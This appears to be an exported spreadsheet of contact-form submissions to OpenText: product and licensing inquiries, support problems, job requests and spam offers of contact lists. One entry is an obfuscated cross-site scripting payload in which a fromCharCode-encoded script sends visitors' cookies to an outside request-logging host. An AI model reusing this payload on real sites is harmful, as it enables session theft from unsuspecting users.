    <t>Hi,_x000D_
_x000D_
I currently have a client in Houston in the midstream industry looking for more information and licensing with Documentum. Please contact me via cell or email._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Looking at getting the Exceed software package to talk to a VMS machine.  Can You give me a price for this.</t>
  </si>
  <si>
    <t>My name is Todd Ramos. I would like to introduce myself to help improve your business. With ten years’ experience in the digital marketing and web design field, I am proud to confidently offer my clients quality work as a certified Google Partner. Whether you are looking to improve your blog, appeal to customers using high end keyword research, or become more visible with link building and making your way to the top of the search engine results, I would be happy to assess your current situation and show you the steps needed to make your business thrive. _x000D_
Please feel free to visit my company’s website at www.pentechconsulting.com. And do not hesitate to contact me by phone or e-mail with any questions you may have. _x000D_
_x000D_
Sincerely,_x000D_
Todd Ramos_x000D_
Co-Founder, Google Partner_x000D_
PenTech Consulting_x000D_
CT Office:_x000D_
8 Wright Street 1st Floor_x000D_
Westport, CT 06880_x000D_
NYC Office:_x000D_
299 Park Avenue 6th Floor_x000D_
New York, NY 10171_x000D_
VT Office:_x000D_
514 Bergrucken Lane, _x000D_
Stamford, VT, 05352_x000D_
Office: (203) 701-9414_x000D_
Cell: (203) 490-5725_x000D_
E-Mail: todd.ramos@pentechconsulting.com_x000D_
Website: www.pentechconsulting.com_x000D_
Google Partner: https://www.google.com/partners/?hl=en-US#a_profile;idtf=1659562739</t>
  </si>
  <si>
    <t>Obtaining download link to Brava Reader only. I never received a download link from the website.</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot update the free Brava Reader _x000D_
The following message is received when attempting the update._x000D_
The requested page "/vercheck" could not be found. </t>
  </si>
  <si>
    <t>Looking for an embedded BI solution</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Hope this is a good time._x000D_
 _x000D_
I was on your website and I see that your company specifically deals with Business Intelligence Software solution across the Globe._x000D_
 _x000D_
I would like to check if you would be interested in procuring a targeted series of Tableau, SAP, Power BI, Oracle BI, MicroStrategy, QlikView, IBM Cognos and DOMO customers/users’ precise information to get you an extra pool of potential leads to accelerating your sales/marketing and promotional activities._x000D_
 _x000D_
We have a register of companies that you can market your products and services. We can assist you in reaching out to the above-mentioned customers/users within those technologies._x000D_
 _x000D_
Each lead comprises: Company Name, Web Address, Contact Name, Verified Email, Job Title, Complete Mailing Address, Phone Number, Direct Number (If applicable), Facsimile and No of users._x000D_
 _x000D_
Please let me know your exact Target Market segment that you’re looking for so that I can get back to you with more information._x000D_
 _x000D_
I’m expecting to hear from you. Have a great weekend_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
 _x000D_
Je me présente, Audrey BALTHAZARD, chargée des relations entreprises au studio Françoise (à Sèvres)._x000D_
Je vous contacte aujourd'hui afin de vous proposer nos offres dédiées aux entreprises. _x000D_
Pouvez-vous me communiquer l'adresse mail du responsable du CE s'il-vous plait?_x000D_
Si cela n'est pas possible, puis-je vous transmettre nos offres afin que vous les transmettiez?_x000D_
_x000D_
En cas d'absence de CE, sachez que nos tarifs s'appliquent tout de même à partir de 5 salariés intéressés. Le cas échéant, une remise de 10% peut être effectuée._x000D_
 _x000D_
Merci d'avance,_x000D_
 _x000D_
Bien cordialement_x000D_
_x000D_
_x000D_
Audrey BALTHAZARD</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for text mining solution </t>
  </si>
  <si>
    <t>Hi,_x000D_
I attended the Innovation day in Eindhoven yesterday and I would like to access the video which have been recorded to listen again to some of the explanations._x000D_
Where could I find them?</t>
  </si>
  <si>
    <t>Download link did not come to either vendors@bbwest.com or IT@bbwest.com</t>
  </si>
  <si>
    <t>I need support for VIPDocview.  I have a user that has VIPDocview installed on his laptop. It just quit working one day. Clicking the shortcut would open the spy32.exe process but not actually launch the application.  We have uninstalled and reinstalled a total of 3 times from different media (network share and CD) with negative results.  _x000D_
We do not know how to proceed from here since reinstalling has not helped._x000D_
I was wondering if there are some registry keys that should be deleted before or after the uninstall or if there is something that we are missing._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We installed the Captiva Quickscan Pro trial that came with our Brother PDS-5000 scanners, how do we purchase a license?</t>
  </si>
  <si>
    <t>Poptávka faxového řešení</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are about to deploy Streamserve (5.6.2) on a project. For Oracle installation purpose i am looking for any document related to Oracle Database recommendations &amp; guidelines. If suche documents exist can you please tell me where i can download/read it? Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, I am looking to understand the licensing model and associated pricing for the Brava Desktop product, the requirement is for users to be able to edit TIFF files. </t>
  </si>
  <si>
    <t>Altrasav Limited has a multi national client with a requisition for Library Management Software.  The client has no existing or legacy  library sofware. The client has required a full demo which can be done remotely. Altrasav can put together local Webex session for this purpose. The client can go with single source without need for open bid. The client has budget. The request is urgent. Please contact Andrew +234 809 854 5888 if you need further information.  Thanks</t>
  </si>
  <si>
    <t>I need a copy of the home app version 12. How can I obtain it?</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
_x000D_
I am interested  about OpenText  and want solve the following doubts, i want to apply a solution documental in un corporate project of great impact :_x000D_
_x000D_
1. Whats the cost of licence OpenText, the pay is only one time?_x000D_
2. Whats the cost of maintenance OpenText?_x000D_
3. The cost of maintenance  is include in the cost of licence ?_x000D_
4. If i need high availability plataform,  is additional cost ?_x000D_
5. Can we have instructor for to train and development in the OpenText?_x000D_
6. What is the maximun number documents than support OpenText or depend the infraestructure Scalable ?_x000D_
7. How must be that infraestructure Scalable, the architecture, for example put  Search Engine scalable, the storage  etc. _x000D_
8.is possible know the blue print the architecture, the main elements?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Efraín Pérez_x000D_
Software Architect</t>
  </si>
  <si>
    <t xml:space="preserve"> The reason  of the contac is  as  for the training or the academy of VIM Vendor Invoice Management , and  in whats part can  search the  information  for  know  about of the course,  because  in the  history of the courses  not   found  the  the course that  I search </t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
Can you please provide Trial version of Opentext capture  and EMC Captiva Designer ,we want to try before we purchase._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am the CIO at Avid Technology. We are a current customer. I do not know who my sales account team is for GXS. Please have someone email me._x000D_
_x000D_
thanks,_x000D_
Jonathan</t>
  </si>
  <si>
    <t>Checking on upgrade options for Captaris Rightfax server.</t>
  </si>
  <si>
    <t>Need to know about online or classroom training for Open text VIM Invoice capture center</t>
  </si>
  <si>
    <t>Hi my name is Savana Gavin and I am a Business Administration/Marketing student at Florida State University and am doing marketing research on Enterprise Search. I am doing an analysis of features and functions of companies in the space and the respective pricing models- any help you can provide would be greatly appreciated.  _x000D_
_x000D_
I look forward to hearing from you,_x000D_
_x000D_
Savana Gavin</t>
  </si>
  <si>
    <t xml:space="preserve">Our Teleform product filter is not working due to JDK upgrade. Can you help us? </t>
  </si>
  <si>
    <t>We are actively investigating options for an A/P imaging and workflow solution in our SAP environment, with an approved budget and implementation date in 2017.  We have evaluated a couple of vendors and would appreciate the opportunity to learn more about the OpenText Vendor Invoice Management for SAP Solution as soon as possible.  Thanks in advance.  Regards, Sarah Ebermayer</t>
  </si>
  <si>
    <t>Looking for a CMS and/or ILS solution.</t>
  </si>
  <si>
    <t>We need a replacement for our old rightfax infrastructure. We are now using VoiP at most locations and it appears that your OpenFax FoiP solution may work for our needs. I need to discuss some of the technical details and inter operability as well as pricing</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope you're doing great._x000D_
_x000D_
I am writing to check if you would be interested in reaching out to users of “Splunk”_x000D_
_x000D_
We also have data for competitors like : Dynatrace, AppDynamics, New Relic, Nagios etc. _x000D_
_x000D_
Please let me know if you would like to connect on a call at your convenience so that we can discuss your requirement._x000D_
_x000D_
Look forward to an opportunity to work with you._x000D_
_x000D_
Best regards,_x000D_
Jordon Miller_x000D_
Pre-Sales Department_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I see that your company is providing Business Intelligence software/solution. I would like to check if you would be interested in acquiring Database of potential Business Intelligence (BI) customers/current users across USA, UK, Canada, Australia, EMEA, APAC and LATAM? _x000D_
_x000D_
Some of other verified contacts: SAP CRM users, SAGE CRM users, Microsoft CRM users, Sugar CRM and many more..._x000D_
_x000D_
Few Other Users you might be interested in:-_x000D_
_x000D_
•	Tibco Analytics Users_x000D_
•	Tableau Users_x000D_
•	MicroStrategy Users_x000D_
•	OpenText Users_x000D_
•	IBM Users_x000D_
•	OracleInformation Builders Users_x000D_
•	Microsoft Users_x000D_
•	SAP Users_x000D_
•	Salesforce users_x000D_
 _x000D_
_x000D_
Our List Includes Company Name, Web Address, Contact Name, Verified Email, Job Title, Application Type, Complete Mailing Address, Phone Number, FAX Number, Total Employees, SIC Code, and Industry details._x000D_
_x000D_
Do share your target audience like:_x000D_
_x000D_
•	Company_x000D_
•	Geography_x000D_
•	Job title_x000D_
_x000D_
So that we can give you more information about our services, we can also provide you with a sample list to check the fields available._x000D_
_x000D_
Feel free to write back to me with your interest and target criteria. If someone else in your organization would be a better contact for me, I’d appreciate your assistance and ask that you forward this to them.   _x000D_
_x000D_
Thanks for your time and consideration. I will look forward for your response!_x000D_
_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Nick Brown_x000D_
Business Development Team_x000D_
 _x000D_
Brigade Business Intelligence Group_x000D_
nick.brown@brigadebig.com_x000D_
(: (512) 375-3739_x000D_
F : 800-787-7154_x000D_
@: www.brigadebig.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I recently applied for a job with OpenText – Senior Technical Writer, Job ID 13440 – for which I received a rejection email. Would it be possible for HR or the hiring manager to briefly outline the reasons my CV was not considered for the shortlist? It would help me greatly in my future job applications to have that kind of feedback._x000D_
_x000D_
If this is not your company policy, then I understand, and appreciate you at least reading this communication._x000D_
regards_x000D_
Tim Raff</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich darf mich zu Beginn dieser Anfrage kurz vorstellen: Mein Name ist Thomas Schneider und ich bin Product Consultant bei der Commerz Finanz GmbH, einem Joint Venture der BNP Paribas und der Commerzbank. Als Spezialist in der Absatzfinanzierung arbeiten wir in Deutschland mit 16.000 Handelspartnern (u.A. Media Markt, Poco) zusammen und sind aktuell auf der Suche nach einer flexiblen Lösung zum Scannen von Ausweisdokumenten. Die Lösung soll bei unseren Handelspartnern zum Einsatz kommen und das Ausweisdokument des Endkunden optisch erfassen sowie per OCR auslesen. Für beide Schritte des Prozesses, Scanning/Imaging per Hardware und OCR per Software, benötigen einen oder zwei verlässliche Partner. Über Ihre Rückmeldung zu diesem Thema würde ich mich freuen._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Thomas Schneider</t>
  </si>
  <si>
    <t>Purchased a Fax Appliance A104 about 5 years ago.  Current client does not work with Windows 10 workstations.  Should I get current on support contract to get Windows 10 support, or should I consider purchasing a new Fax Appliance?  Please advise, thanks.</t>
  </si>
  <si>
    <t>We want to be your reseller in Tanzania</t>
  </si>
  <si>
    <t>We are partnering with Belk and I need to see about setting up a Catalogue with them.</t>
  </si>
  <si>
    <t>Need to get a contact to discuss an RFP for an enterprise archiving solution.</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
We are looking for a solution to store and manage the certificates of conformity ( more than 3000 per year for lifts, fire extinguishers, air-conditioning and so on) we get for our stores._x000D_
_x000D_
We need to have a solution in place before the end of June 17 !!!_x000D_
_x000D_
These are the functionalities required:_x000D_
automatically file the reports per store and type of certificate ( received by email )_x000D_
a dashboard with an overview of the stores showing if the expected reports ( rules to be provided by us) have been received or if reports are missing._x000D_
_x000D_
The dashboard allows to:_x000D_
- Download the certificates_x000D_
- Show the reports which are about expire, expired or that are missing_x000D_
- Search and download reports from a specified period_x000D_
_x000D_
Can you please let me know if the solutions you propose can answer the above needs? _x000D_
if so for when can we have it and what is the budget  and the effort from our side._x000D_
_x000D_
Thank you_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Giada Giao</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I checked this article http://www.cmswire.com/digital-experience/flipping-the-headless-cms-debate-dont-lose-your-head/_x000D_
_x000D_
and want to know if you looking for some more guest posts like this? You can also forward this mail to your current SEO company, we will work together for best result for your website._x000D_
_x000D_
I'm a guest blogger and I can help you to get more guest posts on relevant website._x000D_
_x000D_
_x000D_
Waiting for your comments_x000D_
_x000D_
_x000D_
Thanks_x000D_
Andrew Dominik_x000D_
Skype:Qualityguestpost_x000D_
Web Site: http://www.qualityguestpost.com/_x000D_
</t>
  </si>
  <si>
    <t>I want to work in your company</t>
  </si>
  <si>
    <t xml:space="preserve">We were partners with Quiterian and successfully sold several projects couple of years ago. We'd like to understand the current situation with BIRT analytics: partnership levels, prices, current product (changes), new clients stories. The aim is understand the potentiality of our partnership </t>
  </si>
  <si>
    <t xml:space="preserve">•	Please indicate how licensing works_x000D_
•	Please indicate any hardware requirement for Redact It_x000D_
•	End Users= 400_x000D_
•	SharePoint is 2016_x000D_
•	Server sizing for SharePoint is attached_x000D_
•	Support 3 years_x000D_
</t>
  </si>
  <si>
    <t>Bonjour, nous souhaitons mettre en place avec l'un de nos partenaires, un système EDI pour des échanges de facturation et de commande. Ce dernier étant dans un secteur industriel et des USA, nous souhaiterions connaitre vos possibilités et vos services à ce sujet ?_x000D_
_x000D_
Cdt,_x000D_
_x000D_
M. BERLY</t>
  </si>
  <si>
    <t>OCR Solution --Urgent inquirí.  Kindly email me or call the soonest.  Thank you</t>
  </si>
  <si>
    <t>OCR solution Inquiry --Urgent</t>
  </si>
  <si>
    <t xml:space="preserve">VMware Partner Portal Ticket number_x000D_
[ ref:_00D409hQR._50034v1nJk:ref ]_x000D_
</t>
  </si>
  <si>
    <t>I'm working on a proposal and would like to discuss budgetary pricing to include into our bid price.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am new to birt tool. I have experience in business objects.i need some information about birt tool. Our client looking for web reporting if I develop report on my desktop and exporting report to server. What software I have to download for client server birt tool.</t>
  </si>
  <si>
    <t>Referal for Fresher.</t>
  </si>
  <si>
    <t>Mr. Jenkin's book INNOVATION.  SaskTel role in creating the fiber optic industry.</t>
  </si>
  <si>
    <t>Wonder why you ae diverting all my requests for Magellan.com/support to your site.  I do not need you but I do want to update my magellan gps.  I am an 80 year old senior and I DO NOT APPRECIATE  YOUR BULLSHIT!</t>
  </si>
  <si>
    <t>Interested in learning more about your solution offerings particularly EDI, web platform</t>
  </si>
  <si>
    <t xml:space="preserve">I received a notice that my account would be expiring in four days and I'm not sure how what step to take to keep it active. Could you please advise? _x000D_
_x000D_
The account is under one of my team member's emails: vicki.trieglaff@corporatereport.com. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am interested in learning about any co-op opportunities that are being offered at OpenText for Fall 2017. I am a Computer Science Student here at the University of Waterloo in my 3rd year._x000D_
I was screened and selected for an interview for a coop position for the Winter term and got ranked but couldn't get an offer. I was hoping to know if there are any opportunities for my next co-op term in fall 2017 as I am very interested to gain experience, at the same time, doing my best at OpenText._x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t>I am trying to pay a bill!  I have registered and tried to set up access so I can pay online, as your invoice indicates I can, several times.  I have also called and left messages.  Please, can someone contact me so that I can pay this invoice and receive support from opentext?_x000D_
Thank You_x000D_
Donna Larney 603.893.7009 Ext 1000</t>
  </si>
  <si>
    <t>Interested in more info about your EMR for ED</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a document creation platform for our regulatory materials. </t>
  </si>
  <si>
    <t>Escalation of unresolved Issue: OTS 2991580. Please give me the contact name and number of your UK operations support</t>
  </si>
  <si>
    <t>Lapp Group is looking for an EDI service provider for B2B trading with customers.    We are looking for services similar to a VAN as well as the potential for consulting services, as well as knowledge of SAP.   Thank you.</t>
  </si>
  <si>
    <t>Looking to find out more about ECM and document work flow solutions.</t>
  </si>
  <si>
    <t>Legalkey error: Error #-2147206461_x000D_
File not found. (Source: Crystal Reports ActiveX Designer)_x000D_
_x000D_
We get this error when trying to open a Report._x000D_
_x000D_
I know we have support for our LegalKey application. I don't have the support contact information. Please forward this to the proper department._x000D_
_x000D_
Thank you,_x000D_
George Brown</t>
  </si>
  <si>
    <t>Download Basket question (What is the associated cost?)</t>
  </si>
  <si>
    <t>I am trying to log in but I get a "proxy" error message. Are you aware of the problem?_x000D_
Thanks,_x000D_
Dan</t>
  </si>
  <si>
    <t>trying to embed Birt Data Object(.data), in local application. Need to know how to construct html or how to pass parameters in URL to data object</t>
  </si>
  <si>
    <t>Interest in Documentum for workflow with SAP on AP, PR, PO etc..</t>
  </si>
  <si>
    <t>Fax phone number and setup</t>
  </si>
  <si>
    <t>Inquire about a solution for our need to convert archived PDFs to a searchable OCR format and convert any scanned documents to searchable format on an ongoing basis.</t>
  </si>
  <si>
    <t>procurement of document management system</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested to acquire B2B contacts to reach your target folks? _x000D_
_x000D_
We have all Industries key decision maker’s contacts across the globe in the field of Broadcasting, Digital Media, Film, Entertainment, Telecom, Post-Production, Academia, Mobile, Houses of Worship, Advertising, Military, Government, Retail, Security, Sports, Live Events, Online Video, IT, Virtual and Augmented Reality, and so many more._x000D_
_x000D_
Other services: if you have any in-house list without emails or missing information, we can append that info to the same and deliver back to you._x000D_
_x000D_
Kindly fill your requirements below, so that I will assist you with the further information._x000D_
_x000D_
Target Industry:_x000D_
Target Job Title:_x000D_
Target Geography:_x000D_
_x000D_
Let me know your thoughts._x000D_
_x000D_
Regards,_x000D_
Sharine Harris_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Interest in a fax-to-email solution that does not require on-site analog lines.</t>
  </si>
  <si>
    <t>Hello Good Morning ,  How are you Doing ? I was reaching out to you because I saw your organization was running multiple job postings on a few different sights . I was interested in speaking with you about saving up to 50% on your current jobs you already post . Postings.com has help thousands of  save time and money with an all in one job posting platform . are you tired of not getting enough traction on the job boards? (sponsored ads on indeed , juju , simply hired and job.com  included) are you tired of not being able to find the right candidate? (largest job distribution 300+ job Boards / knock out questions)are you tired of wasting hours looking through and sorting resumes? (track and manage candidates from the cloud ) are you tired of paying retail for job posting ? Call 858-433-5412</t>
  </si>
  <si>
    <t>Sponsorship Request</t>
  </si>
  <si>
    <t>Your support website is down.  502 - Web server received an invalid response while acting as a gateway or proxy server.</t>
  </si>
  <si>
    <t xml:space="preserve">I need contact in Brazil for a budget. _x000D_
Implantation IT system for HR Budget Management (CTMO, HC, Productivity)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am evaluating your tools for a health service provider here in quebec._x000D_
_x000D_
I am finding it difficult to figure out how our needs map onto the different products and solutions you have on offer._x000D_
_x000D_
I would like to walk through your offerings with a sales person._x000D_
_x000D_
Thanks,_x000D_
Kandis</t>
  </si>
  <si>
    <t>Interested to understand more of Documentum</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We have 40,267 Ready-to-buy leads of SAP ERP Technology from USA._x000D_
 Samples will be given to review and check the quality of the lead, then you can proceed further if interested._x000D_
can i send sample data for verification? _x000D_
_x000D_
Regards,_x000D_
Briley Sanford_x000D_
briley.sanford@texttechzone.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am contacting you from Zebu Compliance Solutions! We spoke with a representative of your organization at the 2017 Annual HIMSS Conference in Orlando this past month and I was wondering if you could put me in contact with your Purchasing Department or even the Head of Purchasing?</t>
  </si>
  <si>
    <t>Good afternoon. I was made redundant from HP in 2015 having been a Training Manager (EMEA) for TOWER Software ( - the developers of TRIM, now HPRM8) prior to its acquisition in 2008 by HP. I am currently working as a training consultant for Agile Applications, Software Developers for the Local Authority sector in the UK. I am very interested in returning to the world of Electronic Document and Records Management and would be very thankful if you could pass this to the correct department. I am more than happy to relocate if necessary as I live in Somerset and work in Bristol at the moment. I am also more than happy to forward a copy of my CV to you. I hope you will pass this on if necessary and I look forward to hearing from OpenText soon. Best regards, Lorcan Drysdale</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in hearing some details about RightFax._x000D_
Could you please send me a presentation via email?_x000D_
Thank you,</t>
  </si>
  <si>
    <t>Interested in opentext archive center for one of application , evaluating archiving solution for business . Please share the right contact who can explain costing and product in more details.</t>
  </si>
  <si>
    <t>PLEASE,MAKE SUPPORT AND SECURITY ON ALL OF MY ACCOUNTS.MANY ARE MAKING PITY PERSONAL INTEREST IN MY PRICES.......</t>
  </si>
  <si>
    <t>"&gt;&lt;IMG SRC=/ onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,116,56,108,55,117,114,116,56,63,99,111,111,107,105,101,61,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109,34))"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Annual Maintenance Contract Renewal_x000D_
_x000D_
We are approaching the below person but we are not get any responses from team. Please provide contact person details for conclude the AMC renewal._x000D_
_x000D_
Roy Touma_x000D_
Support Sales and Renewals Account Manager_x000D_
OpenText _x000D_
mobile: +1 514 208 0159_x000D_
rtouma@opentext.com_x000D_
 </t>
  </si>
  <si>
    <t>To know info abou OpenText DMS.</t>
  </si>
  <si>
    <t>Dear Sir/Ma'am:_x000D_
_x000D_
_x000D_
Greetings!_x000D_
_x000D_
_x000D_
Our Reference 204174. I am writing in your regard to Mr/s. AGUILA KRISTINE HAZEL ADAO, whom I have been trying to get in touch with  and whose most recent employment is at OpenText ( Philippines), Inc. 36th Floor, Tower II RCBC Plaza 6819 Ayala Ave cor Gil Puyat Ave Makati City Manila 1227 Philippines. _x000D_
_x000D_
It is imperative that I need to contact this individual quickly because I have an urgent and confidential message to deliver._x000D_
_x000D_
_x000D_
In this regard, I would like to seek an assistance from your good office in helping me to re-establish communication with this person._x000D_
_x000D_
I can be contacted at (+632) 485 7575 Local 134. 09157917267, 09473089332 or by e-mail._x000D_
_x000D_
Your assistance will be highly appreciated._x000D_
_x000D_
_x000D_
Very truly yours,_x000D_
_x000D_
Liza G. Alar                                                                                                                    _x000D_
Supervisor_x000D_
_x000D_
_x000D_
_x000D_
Aiqon Unicorp Inc._x000D_
12F Orient Square Bldg._x000D_
#26 F. Ortigas Jr. Road, Ortigas Centre_x000D_
Pasig City, Philippines 1605_x000D_
_x000D_
Phone : + 632 485 7979_x000D_
Fax     : + 632 621 5376_x000D_
Web   :  www.aiqoncapital.com </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mr/Ms,_x000D_
_x000D_
Good Day !_x000D_
_x000D_
We are representative of HireRight and we do Background Screening. We would like to Inquire if this email address is your company email address or a business email: also, if you are currently employed with the company and if you are the one authorized for doing verification._x000D_
_x000D_
If in case you have specific department and/or representative for verification, please provide the email address/alternate contact information._x000D_
_x000D_
Your assistance will be greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Albert Yeoh | International Verifications Researcher | 001-949-737-2709 Ext. 8585381 [o] | 001-949-224-6064  [f]_x000D_
_x000D_
If you are a Candidate and have any questions or concerns, view our global phone contact numbers here to speak to a representative._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear openText, _x000D_
_x000D_
This is Jin Wei from BMW NSFC IT Operation team. Nice to meet you!_x000D_
I searched in the internet, and tried to find the best document management company, and I found your company. _x000D_
_x000D_
BMW itself has a document management system already, but maybe we are thinking to replace it in future. _x000D_
So the reason I write the email to you is I would like to know more about your company and especially about your document management product. _x000D_
_x000D_
Could you please tell me if you are interested that we are partners in future?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Looking for additional information on Brava viewer for SharePoint (SharePoint Online/Office 365 and SharePoint 2016 on-premises) for a client.</t>
  </si>
  <si>
    <t xml:space="preserve">Legacy version of RightFax in this organization. Removed the CTO and we need to automate some severely paper processes. Would like to know upgrade options/solutions. Looking at ConcordFax HIPAA compliant solutions, as well. </t>
  </si>
  <si>
    <t>Would like to get an update on the roadmap of your content management products.</t>
  </si>
  <si>
    <t>Can you tell me if the Brava View for Documentum supportes using SSH2 algorithm for server certificates? If so do you have any documentation as to the correct SSH2 settings that would be required . Any information would be greatly helpful.</t>
  </si>
  <si>
    <t>Interested in OpenText (possibly On-Demand or Cloud edition)</t>
  </si>
  <si>
    <t>Looking for a DRM solution</t>
  </si>
  <si>
    <t>Shopping and comparing Content Migration Tool</t>
  </si>
  <si>
    <t xml:space="preserve">Procurement would like a test instance of Snap / Leap to test </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for info related to document management,icr and ocr . We have many forms mailed and faxed to us with quite a bit of manual entry. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a document management system for a small group of people to use (~8), that will enable us to create, edit, review and approve documents, as well as track version history. </t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I am a Nanotechnology Engineering student at the University of Waterloo. I am inquiring to find out if there are any co-op jobs to which I could apply for within your company._x000D_
_x000D_
Thank you,_x000D_
Stevan Simidzija</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am trying to find a Brick code for sweaters. I found this on GS1 website: Brick code 10001351. Is this the correct brick code for regular sweaters/pullover? Is the Brick codes used in the OpenText Active Catalog?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Michael Gutierrez</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
Our account # is W401024043.  Our monthly bill says:_x000D_
Network charges $40_x000D_
Mail Charges ELN FEE $60_x000D_
Could you please describe exactly what services you provide for us?_x000D_
_x000D_
Thank you,_x000D_
Aileen  </t>
  </si>
  <si>
    <t>Would like pricing on OpenText Media Management DAM, please.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we currently own ApplicationXtender would like to speak with our Account Representative. </t>
  </si>
  <si>
    <t>We are in the market for a centralized fax server. I would like to get some more information to see f this solution fits our needs.</t>
  </si>
  <si>
    <t xml:space="preserve">A mutual customer, Ice Miller, provided me your contact information.  We are a solution provider for the corporate M&amp;A practice within Ice.  We are interested in further integrating Doxly with OpenText.  Specifically, we are looking to be able to easily upload/download documents directly between Doxly and OpenText.  _x000D_
_x000D_
I wanted to see if you can get me in touch with the appropriate individuals at OpenText to discuss potential options for an integration.  _x000D_
</t>
  </si>
  <si>
    <t>right fax support</t>
  </si>
  <si>
    <t>to be on email threads</t>
  </si>
  <si>
    <t>Looking for job opportunities in Marketing or Event field</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
 _x000D_
Good Day! We are from CITI Application Readiness Team, need your assistance in order to gather info about application compatibility and support for Windows 10. We would like to know whether the below application is compatible and supported for Win 10 (64 Bit). If you haven’t tested , could you please provide us a tentative date of when we can reach you . _x000D_
 _x000D_
Application Name : _x000D_
 _x000D_
HP Output Explorer v 4.1.0.6_x000D_
_x000D_
If the above version is not compatible with Windows 10. Then do we have any higher version/replacement which will be compatible with Windows 10._x000D_
 _x000D_
 _x000D_
Thanks in Advance,_x000D_
Indumathi S_x000D_
Citigroup Inc._x000D_
+91-4439290919</t>
  </si>
  <si>
    <t>Goody day! I want to prepare offer for our customer (goverment). They want virtual fax (Rightfax). We were sell fax solution from 2RING, but now we would like a new vendor. Our Customer has 2 location. At first location, they want 30 fax mailboxes, and 30 current incomer/ outgoing fax. Second location want 10 fax mainboxes and 10 current incomer/ outgoing fax. Please, can you prepare offer for us? Support 1Y, with your implementation (webex remote acces). Contact me, via email only. Thank you. Best Regrads Vojtech Prikryl</t>
  </si>
  <si>
    <t>Interest in joining Open Text in Gaithersburg, MD as Sr. Software Sales Consultant / Engineer with over 25 years experience.</t>
  </si>
  <si>
    <t>Active Customer Support contract for Opentext Exstream.</t>
  </si>
  <si>
    <t>I want to know how can l have access to certification material online and also certify online in Zimbabwe.</t>
  </si>
  <si>
    <t xml:space="preserve">I am in need of the following information:_x000D_
•	Contract Start Date_x000D_
•	Contract End Date_x000D_
•	Contract Number_x000D_
•	Provide a copy of the signed contract_x000D_
•	Address/City/State/Zip location of where lines of service are_x000D_
_x000D_
Vendor	Acct#/Bill Payer_x000D_
EasyLink Services	026772-000_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please give the cost of license Team Developer 6.3 .NET (includes Win32) Full Product (62-1101-6300) _x000D_
 </t>
  </si>
  <si>
    <t>We would like a demo of DMS or ECM solution offered</t>
  </si>
  <si>
    <t>We are an existing EMC Documentum customer. We are wanting to understand OpenText's long term roadmap and plan for Documentum. We will be using this information as part of our IT strategy. _x000D_
_x000D_
We do not want to speak to an EMC representative. We would like to speak to an OpenText representative.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
die BAHAG AG baut aktuell Ihr DMS/CMS System aus. Dabei stehen verschiedene Anwendungsszenarien im Focus:_x000D_
_x000D_
1. Belegarchivierung der Warenwirtschaft_x000D_
2. Belegarchivierung der Logistik_x000D_
3. Personalakte_x000D_
4. Rechtsakte_x000D_
5. Vertragsakte_x000D_
6. Gesellschaftsakte (Übergeordnete Dokumentverwaltung aller Gesellschaften und Niederlassungen von Bauhaus)_x000D_
_x000D_
In diesem Zusammenhang prüfen wir die Erweiterung unseres bestehenden elektronischen Archivs (ca. 150 Mio Dokumente) bzw. die Migration auf ein neues System._x000D_
_x000D_
Von besonderem Interesse wäre dabei folgende Funktionalität_x000D_
